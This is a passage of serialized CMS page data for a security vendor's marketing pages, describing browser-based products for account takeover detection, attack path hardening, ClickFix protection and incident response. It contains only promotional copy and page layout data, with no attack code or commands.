can’t","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb4dd9db24bc9495b8a686b1b4d492016%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=b4dd9db24bc9495b8a686b1b4d492016&alt=media&optimized=true",{"large":494},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":240},{"@type":106,"@version":107,"id":496,"meta":497,"component":498,"responsiveStyles":500},"builder-0bc0d1c78ece4994993c3a6427a4d533",{"previousId":242},{"name":244,"options":499,"isRSC":118},{"AllPartners":246,"backgroundTransparent":6},{"large":501},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":249},{"@type":106,"@version":107,"id":503,"meta":504,"component":505,"responsiveStyles":507},"builder-e45de8f3768c4f16938dbf78e4e87524",{"previousId":251},{"name":253,"options":506,"isRSC":118},{"darkMode":246},{"large":508},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":510,"component":511,"responsiveStyles":516},"builder-c98e8bfd341146c1b67c02d5698ff093",{"name":258,"tag":258,"options":512,"isRSC":118},{"darkMode":6,"maxWidth":262,"maxTextWidth":263,"title":513,"description":514,"image":515,"reverse":6},"\u003Ch2>Assume less. See more.\u003C/h2>","\u003Cp>Most account takeovers don’t start with a breach, they start with a login. Whether it’s a reused password, a local account, or an outdated login flow, Push shows you how accounts are actually accessed day to day, not just how policies say they should be. That means no more blind spots around ghost logins, bypassed SSO, or stale access paths that quietly persist.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F18630ad2746d4eb7b7fcc0428b11a8f0",{"large":517},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":519,"meta":520,"component":521,"responsiveStyles":526},"builder-55c1fc38ddc04fd1a0d6a8e2fb819e00",{"previousId":270},{"name":272,"options":522,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":275,"title":523,"description":524,"reverse":246,"image":525},"\u003Ch2>Catch stolen credential use in real time\u003C/h2>","\u003Cp>Push monitors login activity directly in the browser to detect signs of credential-based attacks like leaked password use or suspicious login flows. By analyzing attacker TTPs instead of relying on known indicators, Push spots credential stuffing and account takeover attempts the moment they begin, not after they’ve succeeded.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F52b0123cac2c4dfdb1dc0af6adf9d603",{"large":527},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":281,"paddingTop":283,"marginTop":283},{"@type":106,"@version":107,"id":529,"meta":530,"component":531,"responsiveStyles":536},"builder-dfb31737b30948c6b95323655d571a50",{"previousId":285},{"name":272,"options":532,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":288,"title":533,"description":534,"reverse":6,"image":535},"\u003Ch2>Detect session hijacks and stealth access\u003C/h2>","\u003Cp>Attackers don’t always need a login screen, they often sidestep it entirely using stolen session tokens. Push detects when valid sessions are reused in unexpected ways, identifying hijacked sessions and stealth access attempts that traditional tools miss. Because we monitor directly in the browser, you see what’s happening inside active sessions in real time.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F94a6859a99e04d309ffe5841f3dbdf5c",{"large":537},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":294},{"@type":106,"@version":107,"layerName":272,"id":539,"meta":540,"component":541,"responsiveStyles":546},"builder-f7585b90eb974d03a7dc7eae5b58d227",{"previousId":296},{"name":272,"options":542,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":299,"title":543,"description":544,"reverse":246,"image":545},"\u003Ch2>Harden accounts before they’re compromised\u003C/h2>","\u003Cp>Push goes beyond alerts. It identifies apps that still allow local logins, even when SSO is configured, so you can remove weak access paths. Push also flags users without MFA, reused work credentials, or weak passwords, and prompts users in-browser to fix risky behaviors before they’re exploited.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F01c1b638f1b6497093a4f2b8ceddb5bb",{"large":547},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":305},{"@type":106,"@version":107,"id":549,"meta":550,"component":551,"responsiveStyles":553},"builder-ad81d1e3afec49a791214194eae09bdc",{"previousId":307},{"name":253,"options":552,"isRSC":118},{"darkMode":6},{"large":554},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":556,"component":557,"responsiveStyles":559},"builder-8dac1aa4b9d148628d92252bd8eff822",{"name":315,"tag":315,"options":558,"isRSC":118},{"sectionHeading":31,"customClass":317},{"large":560},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":562,"@type":106,"tagName":131,"properties":563,"responsiveStyles":564},"builder-pixel-5ymnk0pwz0x",{"src":133,"aria-hidden":134,"alt":31,"role":135,"width":124,"height":124},{"large":565},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":567},{"path":31,"query":568},{},{},1770892814499,1745499162732,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F58b660fa94aa4b30b0faeb9b663ae41a",[],{"lastPreviewUrl":575,"hasLinks":6,"originalContentId":157,"breakpoints":576,"winningTest":118,"kind":337,"hasAutosaves":6},"https://pushsecurity.com/uc/account-takeover-detection?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=94bebb7bb99d48629ad157e80cf4d81d&builder.overrides.94bebb7bb99d48629ad157e80cf4d81d=94bebb7bb99d48629ad157e80cf4d81d&builder.overrides.use-case-page:/uc/account-takeover-detection=94bebb7bb99d48629ad157e80cf4d81d&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"xsmall":57,"small":33,"medium":34},{"createdDate":578,"id":579,"name":580,"modelId":159,"published":13,"query":581,"data":584,"variations":687,"lastUpdated":688,"firstPublished":689,"testRatio":42,"screenshot":690,"createdBy":43,"lastUpdatedBy":332,"folders":691,"meta":692,"rev":339},1745009370904,"23eb48fb56d3451cab77cb6ed140ee6d","Attack path hardening",[582],{"@type":162,"property":163,"operator":164,"value":583},"/uc/attack-path-hardening",{"tsCode":31,"seoDescription":585,"jsCode":31,"customFonts":586,"fontAwesomeIcon":591,"seoTitle":580,"title":580,"blocks":592,"url":583,"state":684},"Harden access paths with visibility,  detection, and guardrails.",[587],{"kind":174,"files":588,"version":172,"lastModified":173,"subsets":589,"menu":197,"category":198,"variants":590,"family":178},{"100":200,"200":201,"300":202,"500":203,"600":204,"700":205,"800":206,"900":207,"regular":210,"italic":216,"800italic":215,"500italic":209,"600italic":217,"200italic":212,"900italic":208,"700italic":213,"100italic":211,"300italic":214},[176,177],[180,181,182,183,184,185,128,186,187,188,189,190,191,192,193,194,195,196],"faRadar",[593,679],{"@type":106,"@version":107,"tagName":221,"id":594,"meta":595,"children":596},"builder-1d8553eddcaa44d7bba9e2f4ca13af2a",{"previousId":476},[597,613,620,627,636,646,656,666,673],{"@type":106,"@version":107,"id":598,"meta":599,"component":600,"responsiveStyles":611},"builder-84fe3d7c85a743cf8cef649aa974f1ef",{"previousId":480},{"name":225,"options":601,"isRSC":118},{"title":580,"description":602,"points":603,"video":610},"\u003Cp>Push continuously monitors your environment for exposed login paths, weak credentials, and missing protections like MFA. It detects the gaps attackers exploit and helps you close them before they’re used.\u003C/p>",[604,606,608],{"item":605},"Find weak spots like reused passwords, local logins, and missing MFA",{"item":607},"Monitor how users actually log in across apps, flows, and tools",{"item":609},"Enforce secure access with in-browser guardrails","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fdbdcf52892034f1bbddded77f753a343%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=dbdcf52892034f1bbddded77f753a343&alt=media&optimized=true",{"large":612},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":240},{"@type":106,"@version":107,"id":614,"meta":615,"component":616,"responsiveStyles":618},"builder-b3f66f5b08054cc78a06fecfc3ae2337",{"previousId":496},{"name":244,"options":617,"isRSC":118},{"AllPartners":246,"backgroundTransparent":6},{"large":619},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":249},{"@type":106,"@version":107,"id":621,"meta":622,"component":623,"responsiveStyles":625},"builder-4c73418b84be49ed85e6e13d2625c5a0",{"previousId":503},{"name":253,"options":624,"isRSC":118},{"darkMode":246},{"large":626},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":628,"component":629,"responsiveStyles":634},"builder-dec0246085e1485c803f7152b1922a81",{"name":258,"tag":258,"options":630,"isRSC":118},{"darkMode":6,"maxWidth":262,"maxTextWidth":263,"title":631,"description":632,"image":633,"reverse":6},"\u003Ch2>Find the gaps that lead to compromise\u003C/h2>","\u003Cp>Misconfigurations don’t show up in your config files, they show up in how users actually access apps. Push monitors real login behavior in the browser, surfacing risky patterns like local login access, duplicate accounts, or missing protections that leave doors wide open.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F309a59bba8d247a19476bb369397460e",{"large":635},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":637,"meta":638,"component":639,"responsiveStyles":644},"builder-ebf049a645604a249550996a88f8f3b6",{"previousId":519},{"name":272,"options":640,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":275,"title":641,"description":642,"reverse":246,"image":643},"\u003Ch2>See real login behavior\u003C/h2>","\u003Cp>Push watches authentication flows as they happen, giving you a live view of how users log in, which methods they choose, and where protections like MFA are missing. Plus, uncover every app and account in use, even shadow IT you didn’t know existed, without relying on stale config files or IdP assumptions. \u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb51f6b0357cc451b87a7a5016d984e5e",{"large":645},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":281,"paddingTop":282,"marginTop":283},{"@type":106,"@version":107,"id":647,"meta":648,"component":649,"responsiveStyles":654},"builder-431d175c59004669b0b2776b07d71737",{"previousId":529},{"name":272,"options":650,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":288,"title":651,"description":652,"reverse":6,"image":653},"\u003Ch2>Find and fix posture drift\u003C/h2>","\u003Cp>Security posture isn’t static. Push continuously monitors for issues like missing MFA or legacy login methods. When something falls out of policy, you know immediately with custom notifications so you can act before it turns into risk.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F324e39127dfc41e592b1183dfb39892d",{"large":655},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":294},{"@type":106,"@version":107,"layerName":272,"id":657,"meta":658,"component":659,"responsiveStyles":664},"builder-3dffdcbe0a484e2ca4c03f019b6d40ee",{"previousId":539},{"name":272,"options":660,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":299,"title":661,"description":662,"reverse":246,"image":663},"\u003Ch2>Guide users with in-browser guardrails\u003C/h2>","\u003Cp>Push doesn’t just surface problems, it helps you fix them. When users sign in without MFA, reuse a password, or use insecure credentials, Push prompts them directly in the browser to secure their access. It’s faster, more effective, and actually gets results.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fee8b75d13e45488aba55434a8b49ebb0",{"large":665},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":305},{"@type":106,"@version":107,"id":667,"meta":668,"component":669,"responsiveStyles":671},"builder-976bc222cd7647ff905f1e01cfedc453",{"previousId":549},{"name":253,"options":670,"isRSC":118},{"darkMode":6},{"large":672},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":674,"component":675,"responsiveStyles":677},"builder-8c47ec2fd0f74382bb3e6c870555632c",{"name":315,"tag":315,"options":676,"isRSC":118},{"sectionHeading":31,"customClass":317},{"large":678},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":680,"@type":106,"tagName":131,"properties":681,"responsiveStyles":682},"builder-pixel-c2dfvzybt4s",{"src":133,"aria-hidden":134,"alt":31,"role":135,"width":124,"height":124},{"large":683},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":685},{"path":31,"query":686},{},{},1770892844854,1745499166112,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F6ca12bf728a045f1a31d40c0beb3bfe5",[],{"kind":337,"lastPreviewUrl":693,"breakpoints":694,"hasLinks":6,"originalContentId":461,"winningTest":118,"hasAutosaves":6},"https://pushsecurity.com/uc/attack-path-hardening?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=23eb48fb56d3451cab77cb6ed140ee6d&builder.overrides.23eb48fb56d3451cab77cb6ed140ee6d=23eb48fb56d3451cab77cb6ed140ee6d&builder.overrides.use-case-page:/uc/attack-path-hardening=23eb48fb56d3451cab77cb6ed140ee6d&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"xsmall":57,"small":33,"medium":34},{"createdDate":696,"id":697,"name":698,"modelId":159,"published":13,"query":699,"data":702,"variations":807,"lastUpdated":808,"firstPublished":809,"testRatio":42,"screenshot":810,"createdBy":43,"lastUpdatedBy":332,"folders":811,"meta":812,"rev":339},1761675020232,"ea4f309d2ffe46c5aa97ebf0fda4e2e3","ClickFix Protection",[700],{"@type":162,"property":163,"operator":164,"value":701},"/uc/clickfix-protection",{"seoDescription":703,"fontAwesomeIcon":704,"customFonts":705,"seoTitle":710,"jsCode":31,"tsCode":31,"title":710,"blocks":711,"url":701,"state":804},"Block attacks that trick users into running malicious code.","faLaptopCode",[706],{"files":707,"subsets":708,"menu":197,"version":172,"kind":174,"family":178,"lastModified":173,"variants":709,"category":198},{"100":200,"200":201,"300":202,"500":203,"600":204,"700":205,"800":206,"900":207,"200italic":212,"800italic":215,"700italic":213,"600italic":217,"100italic":211,"italic":216,"regular":210,"300italic":214,"500italic":209,"900italic":208},[176,177],[180,181,182,183,184,185,128,186,187,188,189,190,191,192,193,194,195,196],"ClickFix protection",[712,799],{"@type":106,"@version":107,"tagName":221,"id":713,"meta":714,"children":715},"builder-d7eefdde0f2a4b2b9de3dcb2978fd6cb",{"previousId":594},[716,732,739,746,756,766,776,786,793],{"@type":106,"@version":107,"id":717,"meta":718,"component":719,"responsiveStyles":730},"builder-56e2c54bcce040a4af8b92ae03706c12",{"previousId":598},{"name":225,"options":720,"isRSC":118},{"title":710,"description":721,"points":722,"image":729},"\u003Cp>ClickFix attacks are one of the fastest-growing threats, tricking users into copying malicious code from a webpage and running it locally. This technique bypasses traditional EDR, email gateways, and network filters, leading directly to ransomware and data theft. Push stops this attack at the source, in the browser, by detecting and blocking the malicious behavior before the user can ever paste the code.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>",[723,725,727],{"item":724},"Detect ClickFix, FileFix, and fake CAPTCHA in the browser",{"item":726},"Block malicious copy-and-paste actions before code is executed",{"item":728},"See full telemetry into which users were targeted and what they saw","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F7b74af62889847ebb3927364485b0546",{"large":731},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":240},{"@type":106,"@version":107,"id":733,"meta":734,"component":735,"responsiveStyles":737},"builder-05f9614d4e3e4dc88b3ee8658f54e10e",{"previousId":614},{"name":244,"options":736,"isRSC":118},{"AllPartners":246,"backgroundTransparent":6},{"large":738},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":249},{"@type":106,"@version":107,"id":740,"meta":741,"component":742,"responsiveStyles":744},"builder-c4fb5179366243c1b6c32d368675cf47",{"previousId":621},{"name":253,"options":743,"isRSC":118},{"darkMode":246},{"large":745},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":747,"meta":748,"component":749,"responsiveStyles":754},"builder-261af50705fd445d8cca4a6ba20d5391",{"previousId":628},{"name":258,"tag":258,"options":750,"isRSC":118},{"darkMode":6,"maxWidth":262,"maxTextWidth":263,"title":751,"description":752,"reverse":6,"image":753},"\u003Ch2>Stop ClickFix-style attacks before they become a breach\u003C/h2>","\u003Cp>Traditional security tools are blind to malicious copy and paste attacks because the attack exploits a gap between the browser and the endpoint. EDR only sees the payload after it runs, and network tools see only part of the picture.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F98b2f7e08dec4eafaf8e24937605b8cf",{"large":755},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":757,"meta":758,"component":759,"responsiveStyles":764},"builder-7d21b8aab8064c40b1e5dd23c4749309",{"previousId":637},{"name":272,"options":760,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":275,"title":761,"description":762,"reverse":246,"image":763},"\u003Ch2>Discover lures at the source\u003C/h2>","\u003Cp>Push inspects page behavior to identify ClickFix attacks as they happen. By inspecting the page, its structure, and how the user interacts with it, Push can detect and block these in-browser threats in real time. This deep, TTP-based inspection spots the trap even on novel pages that are built to bypass traditional web filters and blocklists.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F665bf47e01544c75bf9ddafd3917927b",{"large":765},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":281,"paddingTop":282,"marginTop":283},{"@type":106,"@version":107,"id":767,"meta":768,"component":769,"responsiveStyles":774},"builder-fb91943adf6149259ed9e1e6566c9afe",{"previousId":647},{"name":272,"options":770,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":288,"title":771,"description":772,"reverse":6,"image":773},"\u003Ch2>Block the malicious action\u003C/h2>","\u003Cp>When Push detects a malicious script, it intercepts the user's action and blocks the code from being copied to the clipboard. The user is protected, the attack is stopped, and no malicious code ever reaches the endpoint. Unlike broad DLP tools, this action is surgical, targeting only malicious behavior without disrupting normal work.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F5ee68f81f1ac416685cbfe91298cf827",{"large":775},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":294},{"@type":106,"@version":107,"layerName":272,"id":777,"meta":778,"component":779,"responsiveStyles":784},"builder-bfac95fada864e5a8259b955b5b5f98b",{"previousId":657},{"name":272,"options":780,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":299,"title":781,"description":782,"reverse":246,"image":783},"\u003Ch2>Accelerate ClickFix investigations\u003C/h2>","\u003Cp>When an attack happens, knowing what the user saw or did is critical. Push provides rich browser session data for rapid investigation and containment. Security teams get detailed telemetry on which users were targeted, what lure they were served, and when the block occurred. This enables defenders to reconstruct what happened and respond quickly, even when other tools miss the activity entirely.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F6cdf2a8aeddc4e9a9023cbf974e40239",{"large":785},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":305},{"@type":106,"@version":107,"id":787,"meta":788,"component":789,"responsiveStyles":791},"builder-136892e831684a6987f87d3be67c33d1",{"previousId":667},{"name":253,"options":790,"isRSC":118},{"darkMode":6},{"large":792},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":794,"component":795,"responsiveStyles":797},"builder-dec26b739f2f42beb5a73cfc6c675b60",{"name":315,"tag":315,"options":796,"isRSC":118},{"sectionHeading":31,"customClass":317},{"large":798},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":800,"@type":106,"tagName":131,"properties":801,"responsiveStyles":802},"builder-pixel-koxe7grww2l",{"src":133,"aria-hidden":134,"alt":31,"role":135,"width":124,"height":124},{"large":803},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":805},{"path":31,"query":806},{},{},1770892881888,1761847585203,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F375467b8bef34ed1a8a1cc5b8b67d75f",[],{"lastPreviewUrl":813,"originalContentId":579,"winningTest":118,"hasLinks":6,"kind":337,"breakpoints":814,"hasAutosaves":6},"https://pushsecurity.com/uc/clickfix-protection?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=ea4f309d2ffe46c5aa97ebf0fda4e2e3&builder.overrides.ea4f309d2ffe46c5aa97ebf0fda4e2e3=ea4f309d2ffe46c5aa97ebf0fda4e2e3&builder.overrides.use-case-page:/uc/clickfix-protection=ea4f309d2ffe46c5aa97ebf0fda4e2e3&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"xsmall":57,"small":33,"medium":34},{"createdDate":816,"id":817,"name":818,"modelId":159,"published":13,"query":819,"data":822,"variations":927,"lastUpdated":928,"firstPublished":929,"testRatio":42,"screenshot":930,"createdBy":43,"lastUpdatedBy":332,"folders":931,"meta":932,"rev":339},1745009743870,"a9d5556e77f84a37b5bd52310a7110c1","Incident response",[820],{"@type":162,"property":163,"operator":164,"value":821},"/uc/incident-response",{"seoDescription":823,"customFonts":824,"title":818,"jsCode":31,"fontAwesomeIcon":829,"seoTitle":830,"tsCode":31,"blocks":831,"url":821,"state":924},"Investigate and respond faster with unique browser telemetry.",[825],{"kind":174,"subsets":826,"menu":197,"variants":827,"category":198,"family":178,"version":172,"lastModified":173,"files":828},[176,177],[180,181,182,183,184,185,128,186,187,188,189,190,191,192,193,194,195,196],{"100":200,"200":201,"300":202,"500":203,"600":204,"700":205,"800":206,"900":207,"900italic":208,"600italic":217,"200italic":212,"300italic":214,"100italic":211,"700italic":213,"800italic":215,"regular":210,"italic":216,"500italic":209},"faSatelliteDish","Browser based incident response",[832,919],{"@type":106,"@version":107,"tagName":221,"id":833,"meta":834,"children":835},"builder-653c4aed737b4def88dc4cd2d695660a",{"previousId":594},[836,853,860,867,876,886,896,906,913],{"@type":106,"@version":107,"id":837,"meta":838,"component":839,"responsiveStyles":851},"builder-18190bd36518467d9154d27d7e945b9b",{"previousId":598},{"name":225,"options":840,"isRSC":118},{"title":841,"description":842,"points":843,"video":850},"Browser-based incident response","\u003Cp>Push gives you real-time visibility into what actually happened during a breach, right in the browser where the attack played out. From credential theft to session hijacking, Push captures high-fidelity telemetry so you can investigate quickly, contain confidently, and shut it down before it spreads.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>",[844,846,848],{"item":845},"Reconstruct what happened with real browser session context",{"item":847},"Investigate faster with real-world session context",{"item":849},"Trigger response actions automatically through your SIEM or SOAR","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fd00e39d3b6e346c296261d875cf55652%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=d00e39d3b6e346c296261d875cf55652&alt=media&optimized=true",{"large":852},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":240},{"@type":106,"@version":107,"id":854,"meta":855,"component":856,"responsiveStyles":858},"builder-8a0a8ea63f5d48dd8a6726f2d49cf0ca",{"previousId":614},{"name":244,"options":857,"isRSC":118},{"AllPartners":246,"backgroundTransparent":6},{"large":859},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":249},{"@type":106,"@version":107,"id":861,"meta":862,"component":863,"responsiveStyles":865},"builder-2df65c3f54334df2b26e7cb744886cdc",{"previousId":621},{"name":253,"options":864,"isRSC":118},{"darkMode":246},{"large":866},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":868,"component":869,"responsiveStyles":874},"builder-2c32c869efc2423ab69ef06b150e9f97",{"name":258,"tag":258,"options":870,"isRSC":118},{"darkMode":6,"maxWidth":262,"maxTextWidth":263,"title":871,"description":872,"image":873,"reverse":6},"\u003Ch2>See attacks unfold, not just their aftermath\u003C/h2>","\u003Cp>Attacks happen in the browser, not in logs. Push captures what traditional tools miss: what users clicked, what loaded, what was entered, and how attackers moved. That gives you real-world evidence, not just assumptions, when every second matters.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F36fc719bd1de4a38b916f4d25c81a26d",{"large":875},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":877,"meta":878,"component":879,"responsiveStyles":884},"builder-370e53c6016e432db01e9193a2ce90f6",{"previousId":637},{"name":272,"options":880,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":275,"title":881,"description":882,"reverse":246,"image":883},"\u003Ch2>Investigate faster with high-fidelity data\u003C/h2>","\u003Cp>Reconstructing an incident shouldn’t feel like guesswork. Push records detailed telemetry from inside the browser: page loads, credential inputs, DOM changes, session activity, user behavior. It’s structured, exportable, and ready to plug into your investigation workflows, so you can move fast without digging through proxy logs or relying on user reports.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fa6adda040e684e67a8d68a55c5ce5f6d",{"large":885},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":281,"paddingTop":283,"marginTop":283},{"@type":106,"@version":107,"id":887,"meta":888,"component":889,"responsiveStyles":894},"builder-a7f3767a8d184bd08fb24520bf210e95",{"previousId":647},{"name":272,"options":890,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":288,"title":891,"description":892,"reverse":6,"image":893},"\u003Ch2>Contain and respond in real time\u003C/h2>","\u003Cp>When something looks off, Push doesn’t just alert you, it gives you options. Guide users with in-browser prompts. Terminate sessions. Trigger SOAR workflows. Enrich SIEM alerts. Push gives you the context and control to stop spread before it starts.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb3dedeed5aba4847a2c2d22e10d0ec12",{"large":895},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":294},{"@type":106,"@version":107,"layerName":272,"id":897,"meta":898,"component":899,"responsiveStyles":904},"builder-b92036ee0ece4b32acdbdcc7c377366b",{"previousId":657},{"name":272,"options":900,"isRSC":118},{"darkMode":6,"maxWidth":262,"imageMaxWidth":274,"textPaddingTop":299,"title":901,"description":902,"reverse":246,"image":903},"\u003Ch2>Prevent the next one\u003C/h2>","\u003Cp>Push helps you respond fast, but it also helps you fix what went wrong. It surfaces misconfigurations and risky behaviors that made the attack possible in the first place, then guides users in-browser to remediate. One tool. Full loop. No loose 